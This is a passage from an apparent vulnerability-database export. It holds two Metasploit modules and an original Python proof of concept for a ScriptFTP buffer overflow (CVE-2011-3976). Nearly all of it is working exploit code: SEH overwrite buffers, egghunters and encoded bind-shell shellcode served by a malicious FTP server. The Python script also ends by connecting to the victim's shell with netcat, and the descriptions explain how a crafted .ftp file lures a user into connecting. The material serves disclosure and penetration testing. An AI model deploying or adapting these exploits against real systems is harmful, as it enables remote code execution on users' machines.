susceptible to a remote buffer overflow\r\n\t\t\t\tvulnerability that is triggered when processing a sufficiently long filename during\r\n\t\t\t\ta FTP LIST command resulting in overwriting the exception handler. Social engineering\r\n\t\t\t\tof executing a specially crafted ftp file by double click will result in connecting to\r\n\t\t\t\tour malcious server and perform arbitrary code execution which allows the attacker\r\n\t\t\t\tto gain the same rights as the user running ScriptFTP.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => \"$Revision: 13841 $\",\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'modpr0be', #Vulnerability discovery and original exploit\r\n\t\t\t\t\t'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module\r\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t#[ 'CVE', '?' ],\r\n\t\t\t\t\t#[ 'OSVDB', '?' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/17876/' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.kb.cert.org/vuls/id/440219' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'false',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\\xff\\x0d\\x5c\\x2f\\x0a\",\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::AlphanumMixed,\r\n\t\t\t\t\t'EncoderOptions' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'BufferRegister' => 'EDI', # Egghunter jmp edi\r\n\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# CALL DWORD PTR SS:[EBP-4]\r\n\t\t\t\t\t# scriptftp.exe - File version=Build 3/9/2009\r\n\t\t\t\t\t[ 'Windows XP SP3 / Windows Vista', { 'Offset' => 1746, 'Ret' => \"\\xd6\\x41\" } ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Oct 12 2011',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.ftp']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef setup\r\n\t\tif datastore['SRVHOST'] == '0.0.0.0'\r\n\t\t\tlhost = Rex::Socket.source_address('50.50.50.50')\r\n\t\telse\r\n\t\t\tlhost = datastore['SRVHOST']\r\n\t\tend\r\n\r\n\t\tftp_file = \"OPENHOST('#{lhost}','ftp','ftp')\\r\\n\"\r\n\t\tftp_file << \"SETPASSIVE(ENABLED)\\r\\n\"\r\n\t\tftp_file << \"GETLIST($list,REMOTE_FILES)\\r\\n\"\r\n\t\tftp_file << \"CLOSEHOST\\r\\n\"\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}'...\")\r\n\t\tfile_create(ftp_file)\r\n\t\tsuper\r\n\tend\r\n\r\n\r\n\tdef on_client_unknown_command(c,cmd,arg)\r\n\t\tc.put(\"200 OK\\r\\n\")\r\n\tend\r\n\r\n\tdef on_client_command_list(c,arg)\r\n\r\n\t\tconn = establish_data_connection(c)\r\n\t\tif(not conn)\r\n\t\t\tc.put(\"425 Can't build data connection\\r\\n\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status(\" - Data connection set up\")\r\n\t\tcode = 150\r\n\t\tc.put(\"#{code} Here comes the directory listing.\\r\\n\")\r\n\r\n\t\tcode = 226\r\n\t\tc.put(\"#{code} Directory send ok.\\r\\n\")\r\n\r\n\t\teggoptions =\r\n\t\t{\r\n\t\t\t:checksum => false,\r\n\t\t\t:eggtag => 'cure'\r\n\t\t}\r\n\r\n\t\thunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)\r\n\r\n\t\t# Encode with alphamixed, then unicode mixed\r\n\t\t[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|\r\n\t\t\tenc = framework.encoders.create(name)\r\n\t\t\tif name =~ /unicode/\r\n\t\t\t\t# aligned to ESP & EAX\r\n\t\t\t\tenc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })\r\n\t\t\telse\r\n\t\t\t\tenc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })\r\n\t\t\tend\r\n\t\t\t# NOTE: we already eliminated badchars\r\n\t\t\thunter = enc.encode(hunter, nil, nil, platform)\r\n\t\t\tif name =~/alpha/\r\n\t\t\t\t#insert getpc_stub & align EDX, unicode encoder friendly.\r\n\t\t\t\t#Hardcoded stub is not an issue here because it gets encoded anyway\r\n\t\t\t\tgetpc_stub = \"\\x89\\xe1\\xdb\\xcc\\xd9\\x71\\xf4\\x5a\\x83\\xc2\\x41\\x83\\xea\\x35\"\r\n\t\t\t\thunter = getpc_stub + hunter\r\n\t\t\tend\r\n\t\t}\r\n\r\n\t\tunicode_nop = \"\\x6d\" # DD BYTE PTR DS:[ECX],AL\r\n\r\n\t\tnseh = \"\\x61\" << unicode_nop\r\n\t\tseh = target.ret\r\n\r\n\t\talignment = \"\\x54\" # PUSH ESP\r\n\t\talignment << unicode_nop\r\n\t\talignment << \"\\x58\" # POP EAX\r\n\t\talignment << unicode_nop\r\n\t\talignment << \"\\x05\\x12\\x11\" # ADD EAX,11001200\r\n\t\talignment << unicode_nop\r\n\t\talignment << \"\\x2d\\x01\\x01\" # SUB EAX,1000100\r\n\t\talignment << unicode_nop\r\n\t\talignment << \"\\x2d\\x01\\x10\" # SUB EAX,10000100\r\n\t\talignment << unicode_nop\r\n\t\talignment << \"\\x50\" # PUSH EAX\r\n\t\talignment << unicode_nop\r\n\t\talignment << \"\\xc3\" # RETN\r\n\r\n\t\tbuffer = rand_text_alpha(656)\r\n\t\tbuffer << hunter\r\n\t\tbuffer << rand_text_alpha(target['Offset']-buffer.length)\r\n\t\tbuffer << nseh\r\n\t\tbuffer << seh\r\n\t\tbuffer << alignment\r\n\t\tbuffer << rand_text_alpha(500)\r\n\t\tbuffer << egg\r\n\r\n\t\tprint_status(\" - Sending directory list via data connection\")\r\n\t\tdirlist = \"-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\\r\\n\"\r\n\t\tdirlist << \" 5 ftpuser ftpusers 512 Jul 26 2001 A\\r\\n\"\r\n\t\tdirlist << \"rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\\r\\n\"\r\n\r\n\t\tconn.put(dirlist)\r\n\t\tconn.close\r\n\t\treturn\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17948/"}, {"lastseen": "2016-02-02T08:44:39", "description": "ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST). CVE-2011-3976. Remote exploit for windows platform", "published": "2011-09-20T00:00:00", "type": "exploitdb", "title": "ScriptFTP <= 3.3 - Remote Buffer Overflow LIST", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3976"], "modified": "2011-09-20T00:00:00", "id": "EDB-ID:17876", "href": "https://www.exploit-db.com/exploits/17876/", "sourceData": "# Exploit Title: ScriptFTP <=3.3 Remote Buffer Overflow (LIST)\r\n# Date: September 20, 2011\r\n# Author: modpr0be\r\n# Software Link: http://www.scriptftp.com/ScriptFTP_3_3_setup.exe\r\n# Version: 3.3\r\n# Tested on: Windows XP SP3, Windows Server 2003 SP1 (SE) (VMware 3.1.4 build-385536)\r\n# CVE : -\r\n#\r\n# Thanks: offsec, exploit-db, corelanc0d3r, 5M7X, loneferret, mr_me, _sinner\r\n# \r\n# You should create your own script to work with ScriptFTP\r\n# for example; enable passive and get the remote directory \r\n# on your evil ftp server.\r\n#\r\n# my example script:\r\n# OPENHOST(\"8.8.8.8\",\"ftp\",\"ftp\")\r\n# SETPASSIVE(ENABLED)\r\n# GETLIST($list,REMOTE_FILES)\r\n# CLOSEHOST\r\n# save it to a file with .ftp extension (eg: exploit.ftp)\r\n\r\n# root@bt :/# python scriptftp-bof-poc.py\r\n# [*] ScriptFTP 3.3 Remote Buffer Overflow POC\r\n# [*] by modpr0be[at]digital-echidna[dot]org.\r\n# [*] thanks a lot to cyb3r.anbu | otoy :)\r\n# =============================================\r\n# [*] Evil FTP Server Ready\r\n# [*] Server initiated.\r\n# [*] Awaiting connection...\r\n# [*] Connection created by 172.16.87.129.\r\n# [*] Establishing session.\r\n# [*] Pwning in progress..\r\n# [*] This may take up 50 seconds or less.\r\n# [!] Hunter is hunting the Egg ;)\r\n# [!] Waiting for a shell..\r\n# [!] 0wn3d..!\r\n#\r\n# Microsoft Windows XP [Version 5.1.2600]\r\n# (C) Copyright 1985-2001 Microsoft Corp.\r\n#\r\n# C:\\Program Files\\ScriptFTP>\r\n#\r\n# Yes, this poc is using PASSIVE connection and it will\r\n# take some time to establish. I love the way we wait for a shell ;)\r\n\r\n#!/usr/bin/python\r\n\r\nimport socket\r\nimport os\r\nimport sys\r\nimport time\r\n\r\nclass ftp_server:\r\n def __init__(self):\r\n self.host = '0.0.0.0'\r\n self.passive_port = 7214\r\n self.log(\"\"\"\r\n[*] ScriptFTP <=3.3 Remote Buffer Overflow POC\r\n[*] by modpr0be[at]digital-echidna[dot]org\r\n[*] thanks a lot to cyb3r.anbu | otoy :)\r\n=============================================\r\n[*] Evil FTP Server Ready\"\"\")\r\n\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sock.bind(('', 21))\r\n self.sock.listen(1)\r\n\r\n a = self.passive_port/256\r\n b = self.passive_port%256\r\n self.tuple_port = (a, b)\r\n self.host_join = ','.join(self.host.split('.'))\r\n self.passive = False\r\n\r\n self.log(\"[*] Server initiated.\")\r\n\r\n def log(self, msg):\r\n print msg\r\n\r\n def get(self):\r\n return self.conn.recv(1024).replace('\\r', '').replace('\\n', '')\r\n\r\n def getcwd(self):\r\n return os.getcwd().split(chr(92))[-1]\r\n \r\n def put(self, ftr):\r\n x = {\r\n\r\n 150:\" Data connection accepted from %s:%s; transfer starting.\\r\\n226 Listing completed.\"%(self.host, self.passive_port),\r\n 200:\" Type okay.\",\r\n 220:\" %s Server is ready.\"%self.host,\r\n 226:\" Listing completed.\",\r\n 227:\" Entering Passive Mode (%s,%s,%s)\"%(self.host_join, self.tuple_port[0], self.tuple_port[1]),\r\n 230:\" User logged in, proceed.\",\r\n 250:' \"/%s\" is new cwd.'%self.getcwd(), \r\n 257:' \"/%s\" is cwd.'%self.getcwd(),\r\n 331:\" User name okay, need password.\",\r\n 502:\" Command not implemented.\",\r\n 551:\" Requested action aborted. Page type unknown.\" \r\n\r\n }[ftr]\r\n\r\n s = '%s%s\\r\\n'%(ftr, x)\r\n self.conn.send(s)\r\n return s\r\n\r\n def main(self):\r\n self.log(\"[*] Awaiting connection...\")\r\n self.conn, addr = self.sock.accept ()\r\n self.log(\"[*] Connection created by %s.\\n[*] Establishing session.\"%addr[0])\r\n\tself.put(220)\r\n self.log(\"[*] Pwning in progress..\")\r\n\tself.log(\"[*] This may take up 50 seconds or less.\")\r\n\r\n while 1:\r\n try: \r\n data = self.get().upper()\r\n except socket.error:\r\n self.conn.close()\r\n self.sock.shutdown(socket.SHUT_RDWR)\r\n raise socket.error\r\n\t \r\n if data[:4] == 'USER': s = 331\r\n elif data[:4] == 'PASS': s = 230\r\n elif data[:3] == 'PWD': s = 257\r\n elif data[:4] == 'TYPE': s = 200\r\n elif data[:4] == 'PASV':\r\n # create passive port\r\n self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sock2.bind(('', self.passive_port ))\r\n self.sock2.listen(1)\r\n s = self.put(227)\r\n self.conn2, addr = self.sock2.accept()\r\n self.passive = True\r\n s = 0 # don't routine\r\n \r\n elif data[:3] == 'CWD':\r\n try:\r\n os.chdir('..%s'%data.split(' ')[-1])\r\n s = 250\r\n except OSError:\r\n s = 551\r\n\t\t \r\n elif data[:4] == 'LIST':\r\n s = self.put(150)\r\n s = self.passive_do(1)\r\n s = 0 # don't routine\r\n\t\tprint \"[!] Hunter is hunting the Egg ;)\"\r\n\t\ttime.sleep(50)\r\n\t\tprint \"[!] Waiting for a shell..\"\r\n\t\ttime.sleep(2)\r\n\t\tprint \"[!] 0wn3d..!\\n\"\r\n\t\tos.system(\"nc %s 4444\"%addr[0])\r\n\t\tsys.exit()\r\n else:\r\n\t\ts = 502\r\n\r\n if s:\r\n s = self.put(s)\r\n\r\n def passive_do(self, id):\r\n if id == 1:\r\n\t #bind to port 4444\r\n\t bind = (\"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQ\"\r\n \"APA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A\"\r\n \"IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLI\"\r\n \"XTIKPKPKPC0DIZENQXRS4DK0RNPTKPRLLTKR2LTTKBRO\"\r\n \"8LOVWPJMVNQKONQGPFLOL1Q3LLBNLMPY18OLMM1I7K2J\"\r\n \"P0RR74KPRN0DKOROLKQZ0DKOPRX4EY0RTPJKQXP0PTK1\"\r\n \"8N8DKQHMPKQHSJCOLOYTKODDKM1HVNQKONQY0VLWQHOL\"\r\n \"MKQWWP8IPCEL4LCSML8OK3MMTRUK2R84KQHMTM1YCQV4\"\r\n \"KLLPKTKPXMLKQZ3TKM4TKKQ8P4IQ4O4MTQKQK1QPYPZ2\"\r\n \"1KOK0PXQO1J4KN2ZKU61MQXNSP2KPKPS82W2SP21OQD3\"\r\n \"80LSGNFLGKOZ56X4PM1KPKPO9XDPTPPQXNI3P2KM0KOX\"\r\n \"U0PPPPP0POP0POPPPQXJJLOIOYPKOJ5SYGWNQIKPSBHM\"\r\n \"2KPN1QLU9YVRJLPQFQGC8GRIK07QWKO8U0SR7C87GZIP\"\r\n \"8KOKOJ50SR3PWRHCDZLOKYQKO8UPW5997QX2URN0MQQK\"\r\n \"OYEQX33BMQTKPSYJCPWPWR701JV2JMBR926IRKMQVGWO\"\r\n \"TMTOLKQKQTMPDNDLP7VKPQ40TB0PVPVPVOV26PNQFR6P\"\r\n \"SR6C8SIXLOOTFKOXUCY9P0N0VPFKONPS8KXSWMMQPKO9\"\r\n \"E7KL0X5W2QFQXVFTUWMEMKOHUOLKV3LKZU0KKYP2ULEW\"\r\n \"KQ7MCT2BO2JKPQCKOZ5A\")\r\n\t \r\n\t # 32bit egghunter from corelanc0d3r, thx ;)\r\n\t egghunter = (\"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA\"\r\n\t\t\t \"IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5\"\r\n\t\t\t \"8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB\"\r\n\t\t\t \"ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1\"\r\n\t\t\t \"HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O\"\r\n\t\t\t \"SEYWKOYWA\")\r\n\t\t\t\t \r\n\t junk = \"A\" * 1746\t\t#junk\r\n\t nseh = \"\\x61\\x62\"\t\t#nseh\r\n seh = \"\\x45\\x5B\" \t\t#seh ppr somewhere on scriptftp dir \r\n \r\n\t #prepare for align\r\n align = \"\\x60\"\t\t\t#pushad\r\n\t align += \"\\x73\"\t\t\t#nop/align\r\n\t align += \"\\x53\"\t\t\t#push ebx\r\n\t align += \"\\x73\"\t\t\t#nop/align\r\n align += \"\\x58\"\t\t\t#pop eax\r\n\t align += \"\\x73\"\t\t\t#nop/align\r\n\t align += \"\\x05\\x02\\x11\" \t#add eax,0x11000200\r\n\t align += \"\\x73\" \t#nop/align\r\n align += \"\\x2d\\x01\\x11\" \t#sub eax,0x11000120\r\n\t align += \"\\x73\" \t#nop/align\r\n\t \r\n\t #walking\r\n \t walk = \"\\x50\"\t\t\t#push eax\r\n\t walk += \"\\x73\"\t\t\t#nop/align\r\n\t walk += \"\\xc3\"\t\t\t#ret\r\n \r\n\t #align again\r\n\t align2 = \"0t0t\" + \"\\x73\\x57\\x73\\x58\\x73\"\t\t#nop/push edi/nop/pop eax/nop\r\n\t align2 += \"\\xb9\\x1b\\xaa\"\t\t\t#mov ecx,0xaa001b00\r\n\t align2 += \"\\xe8\\x73\"\t\t\t#add al,ch + nop\r\n\t align2 += \"\\x50\\x73\\xc3\"\t\t\t#push eax,nop,ret\r\n\r\n\t sampah1 = \"\\x44\" * 106 + \"\\x73\"\t\t#eax+106/align nop\r\n\t sampah2 = \"\\x42\" * 544\t\t\t#right after shellcode\r\n\t \r\n\t crash = junk+nseh+seh+align+walk+sampah1+egghunter+sampah2+align2+bind+sampah1\r\n\r\n res = \"\"\"-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 \"\"\"+crash+\"\"\".txt\\r\\ndrwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 A\\r\\nrwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 \"\"\"+ crash +\".txt\\r\\n\"\r\n\r\n self.conn2.send(res)\r\n # self.conn2.send('\\r\\n') # send blank\r\n\treturn res\r\n\r\ntry:\r\n\tftp_server().main()\r\nexcept socket.error:\r\n print \"[!] Socket is not ready, shutting down...\\n\"\r\n\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17876/"}], "metasploit": [{"lastseen": "2020-06-18T22:28:20", "description": "AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow vulnerability that is triggered when processing a sufficiently long filename during a FTP LIST command resulting in overwriting the exception handler. Social engineering of executing a specially crafted ftp file by double click will result in connecting to our malicious server and perform arbitrary code execution which allows the attacker to gain the same rights as the user running ScriptFTP. This vulnerability affects versions 3.3 and earlier.\n", "published": "2011-10-09T04:17:03", "type": "metasploit", "title": "ScriptFTP LIST Remote Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3976"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/WINDOWS/FTP/SCRIPTFTP_LIST", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::FtpServer\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Egghunter\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ScriptFTP LIST Remote Buffer Overflow',\n 'Description' => %q{\n AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow\n vulnerability that is triggered when processing a sufficiently long\n filename during a FTP LIST command resulting in overwriting the\n exception handler. Social engineering of executing a specially crafted\n ftp file by double click will result in connecting to our malicious\n server and perform arbitrary code execution which allows the attacker to\n gain the same rights as the user running ScriptFTP. This vulnerability\n affects versions 3.3 and earlier.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'modpr0be', #Vulnerability discovery and original exploit\n 'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module\n 'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2011-3976' ],\n [ 'OSVDB', '75633' ],\n [ 'EDB', '17876' ],\n [ 'US-CERT-VU', '440219' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'DisablePayloadHandler' => false\n },\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\xff\\x0d\\x5c\\x2f\\x0a\",\n 'EncoderType' => Msf::Encoder::Type::AlphanumMixed,\n 'EncoderOptions' =>\n {\n 'BufferRegister' => 'EDI', # Egghunter jmp edi\n }\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # CALL DWORD PTR SS:[EBP-4]\n # scriptftp.exe - File version=Build 3/9/2009\n [ 'Windows XP SP3 / Windows Vista', { 'Offset' => 1746, 'Ret' => \"\\xd6\\x41\" } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 12 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.ftp']),\n ])\n\n end\n\n def setup\n if datastore['SRVHOST'] == '0.0.0.0'\n lhost = Rex::Socket.source_address('50.50.50.50')\n else\n lhost = datastore['SRVHOST']\n end\n\n ftp_file = \"OPENHOST('#{lhost}','ftp','ftp')\\r\\n\"\n ftp_file << \"SETPASSIVE(ENABLED)\\r\\n\"\n ftp_file << \"GETLIST($list,REMOTE_FILES)\\r\\n\"\n ftp_file << \"CLOSEHOST\\r\\n\"\n\n print_status(\"Creating '#{datastore['FILENAME']}'...\")\n file_create(ftp_file)\n super\n end\n\n\n def on_client_unknown_command(c,cmd,arg)\n c.put(\"200 OK\\r\\n\")\n end\n\n def on_client_command_list(c,arg)\n\n conn = establish_data_connection(c)\n if(not conn)\n c.put(\"425 Can't build data connection\\r\\n\")\n return\n end\n\n print_status(\" - Data connection set up\")\n code = 150\n c.put(\"#{code} Here comes the directory listing.\\r\\n\")\n\n code = 226\n c.put(\"#{code} Directory send ok.\\r\\n\")\n\n eggoptions =\n {\n :checksum => false,\n :eggtag => 'cure'\n }\n\n hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)\n\n # Encode with alphamixed, then unicode mixed\n [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|\n enc = framework.encoders.create(name)\n if name =~ /unicode/\n # aligned to ESP & EAX\n enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })\n else\n enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })\n end\n # NOTE: we already eliminated badchars\n hunter = enc.encode(hunter, nil, nil, platform)\n if name =~/alpha/\n #insert getpc_stub & align EDX, unicode encoder friendly.\n #Hardcoded stub is not an issue here because it gets encoded anyway\n getpc_stub = \"\\x89\\xe1\\xdb\\xcc\\xd9\\x71\\xf4\\x5a\\x83\\xc2\\x41\\x83\\xea\\x35\"\n hunter = getpc_stub + hunter\n end\n }\n\n unicode_nop = \"\\x6d\" # DD BYTE PTR DS:[ECX],AL\n\n nseh = \"\\x61\" << unicode_nop\n seh = target.ret\n\n alignment = \"\\x54\" # PUSH ESP\n alignment << unicode_nop\n alignment << \"\\x58\" # POP EAX\n alignment << unicode_nop\n alignment << \"\\x05\\x12\\x11\" # ADD EAX,11001200\n alignment << unicode_nop\n alignment << \"\\x2d\\x01\\x01\" # SUB EAX,1000100\n alignment << unicode_nop\n alignment << \"\\x2d\\x01\\x10\" # SUB EAX,10000100\n alignment << unicode_nop\n alignment << \"\\x50\" # PUSH EAX\n alignment << unicode_nop\n alignment << \"\\xc3\" # RETN\n\n buffer = rand_text_alpha(656)\n buffer << hunter\n buffer << rand_text_alpha(target['Offset']-buffer.length)\n buffer << nseh\n buffer << seh\n buffer << alignment\n buffer << rand_text_alpha(500)\n buffer << egg\n\n print_status(\" - Sending directory list via data connection\")\n dirlist = \"-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\\r\\n\"\n dirlist << \" 5 ftpuser ftpusers 512 Jul 26 2001 A\\r\\n\"\n dirlist << \"rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\\r\\n\"\n\n conn.put(dirlist)\n conn.close\n return\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/scriptftp_list.rb"}]}